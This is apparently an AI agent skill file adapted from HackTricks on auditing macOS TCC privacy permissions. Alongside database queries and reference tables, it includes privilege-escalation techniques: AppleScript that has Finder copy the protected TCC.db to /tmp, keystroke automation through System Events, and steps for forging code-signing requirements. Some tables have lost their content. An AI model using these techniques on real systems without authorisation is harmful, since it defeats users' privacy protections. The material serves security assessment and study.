Hacktricks-skills macos-tcc-analyzer
Analyze macOS TCC (Transparency, Consent, and Control) permissions, query TCC databases, and assess TCC-based privilege escalation opportunities. Use this skill whenever the user mentions macOS security, TCC permissions, privacy protections, Full Disk Access, accessibility permissions, automation permissions, or any macOS application permission auditing. Trigger for security assessments, penetration testing, or understanding what permissions apps have on macOS systems.
install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest:
skills/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc/SKILL.MDsource content
macOS TCC Analyzer
A skill for analyzing macOS TCC (Transparency, Consent, and Control) permissions, querying TCC databases, and identifying potential privilege escalation vectors.
What is TCC?
TCC is macOS's security framework that regulates application permissions for sensitive features like:
- Location services
- Contacts, photos, microphone, camera
- Accessibility
- Full Disk Access (FDA)
- Automation (Apple Events)
Quick Start
Query User TCC Database
sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db sqlite> select service, client, auth_value from access;
Query System TCC Database
sudo sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db sqlite> select service, client, auth_value from access;
Check Specific App Permissions
# Approved permissions for an app sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db \ "select service, client, auth_value from access where client LIKE '%telegram%' and auth_value=2;" # Denied permissions sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db \ "select service, client, auth_value from access where client LIKE '%telegram%' and auth_value=0;"
TCC Database Locations
| Database | Path | Protection |
|---|---|---|
| User TCC | | TCC protected (read/write) |
| System TCC | | SIP + TCC protected |
| Location Services | | SIP protected |
| REG.db | | SIP + TCC protected |
| MDMOverrides | | SIP + TCC protected |
| AllowApplicationsList | | SIP protected (readable) |
Auth Values
| Value | Meaning |
|---|---|
| 0 | Denied |
| 1 | Unknown |
| 2 | Allowed |
| 3 | Limited |
Auth Reasons
| Value | Meaning |
|---|---|
| 1 | Error |
| 2 | User Consent |
| 3 | User Set |
| 4 | System Set |
| 5 | Service Policy |
| 6 | MDM Policy |
| 7 | Override Policy |
| 8 | Missing usage string |
| 9 | Prompt Timeout |
| 10 | Preflight Unknown |
| 11 | Entitled |
| 12 | App Type Policy |
Common TCC Services
| Service | Description |
|---|---|
| Microphone access |
| Camera access |
| Contacts access |
| Calendar access |
| Photos access |
| Reminders access |
| Full Disk Access |
| Desktop folder access |
| Documents folder access |
| Downloads folder access |
| Automation/Apple Events |
| Post events |
| Accessibility |
| Endpoint Security Client (grants FDA) |
| SysAdmin files |
| Location services |
TCC Privilege Escalation Vectors
1. Automation + Finder → FDA*
If you have
kTCCServiceAppleEventsosascript<<EOD tell application "Finder" set homeFolder to path to home folder as string set sourceFile to (homeFolder & "Library:Application Support:com.apple.TCC:TCC.db") as alias set targetFolder to POSIX file "/tmp" as alias duplicate file sourceFile to targetFolder with replacing end tell EOD
2. System Events + Accessibility → FDA*
With
kTCCServicePostEventkTCCServiceAccessibilitytell application "System Events" tell application "Finder" to activate keystroke "g" using {command down, shift down} delay 1 keystroke "/tmp" delay 1 keystroke return end tell
3. Endpoint Security Client → FDA
Having
kTCCServiceEndpointSecurityClient4. SIP Bypass → TCC Bypass
If you can bypass SIP, you can:
- Modify system TCC database
- Modify
to add your appAllowApplicationsList.plist - Remove protection from TCC databases
TCC Signature Checks
TCC stores code signing requirements (
csreq# Get csreq from database sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db \ "select service, client, hex(csreq) from access where auth_value=2;" # Decode csreq echo "FADE0C00..." | xxd -r -p > csreq.bin csreq -t -r csreq.bin # Create new csreq for an app REQ_STR=$(codesign -d -r- /Applications/YourApp.app 2>&1 | awk -F ' => ' '/designated/{print $2}') echo "$REQ_STR" | csreq -r- -b /tmp/csreq.bin
Reset TCC Permissions
# Reset all permissions for an app tccutil reset All com.example.app # Reset all permissions for all apps tccutil reset All
User Intent / com.apple.macl
Files can have extended attributes granting specific app access:
# Check file's macl attribute xattr filename # Read macl details macl_read filename # Get app UUID otool -l /Applications/YourApp.app/Contents/MacOS/YourApp | grep uuid
Helper Scripts
Use the bundled scripts for common tasks:
- Query TCC databases with filtersquery-tcc-database.sh
- Check all permissions for a specific appcheck-app-permissions.sh
- Generate comprehensive TCC permission reportgenerate-tcc-report.sh
- Extract and decode csreq from TCC databaseextract-csreq.sh
Security Considerations
- TCC databases are protected - User database requires TCC privileges to read/write, system database requires SIP bypass
- Signature verification - Apps must match stored csreq to use granted permissions
- Entitlements matter - Apps need proper entitlements to request certain permissions
- Responsible process - TCC tracks the GUI app responsible, not just the requesting process
- Finder always has FDA - But you can't execute arbitrary code through it